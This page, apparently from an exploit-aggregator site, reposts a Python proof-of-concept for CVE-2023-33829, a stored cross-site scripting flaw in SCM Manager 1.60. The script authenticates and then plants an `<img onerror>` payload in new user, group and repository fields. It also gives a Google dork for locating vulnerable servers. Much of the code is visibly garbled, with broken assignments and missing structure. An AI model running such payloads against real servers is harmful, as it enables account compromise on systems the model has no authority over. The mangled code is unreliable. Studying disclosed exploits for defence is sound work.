SCM Manager 1.60 Cross Site Scripting

Our sensors found this exploit at:

Below is a copy:

SCM Manager 1.60 Cross Site Scripting

# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)
# Google Dork: intitle:"SCM Manager" intext:1.60
# Date: 05-25-2023
# Exploit Author: neg0x (
# Vendor Homepage:
# Software Link:
# Version: 1.2 <= 1.60
# Tested on: Debian based
# CVE: CVE-2023-33829

# Modules
import requests
import argparse
import sys

# Main menu
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", help="password of the user")
args = parser.parse_args()

# Credentials
user = sys.argv[2]
password = sys.argv[4]

# Global Variables
main_url = "http://localhost:8080/scm" # Change URL if its necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"

# Create a session
session = requests.Session()

# Credentials to send
'username': user, # change if you have any other user with write permissions
'password': password # change if you have any other user with write permissions

r =, data=post_data)

if r.status_code == 200:
print("[+] Authentication successfully")
print("[-] Failed to authenticate")


"name": "newUser",
"displayName": "<img src=x onerror=alert('XSS')>",
"mail": "",
"password": "",
"admin": False,
"active": True,
"type": "xml"


create_user =, json=new_user)
print("[+] User with XSS Payload created")


"name": "newGroup",
"description": "<img src=x onerror=alert('XSS')>",
"type": "xml"


create_group =, json=new_group)
print("[+] Group with XSS Payload created")


"name": "newRepo",
"type": "svn",
"contact": "",
"description": "<img src=x onerror=alert('XSS')>",
"public": False


create_repo =, json=new_repo)
print("[+] Repository with XSS Payload created")

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.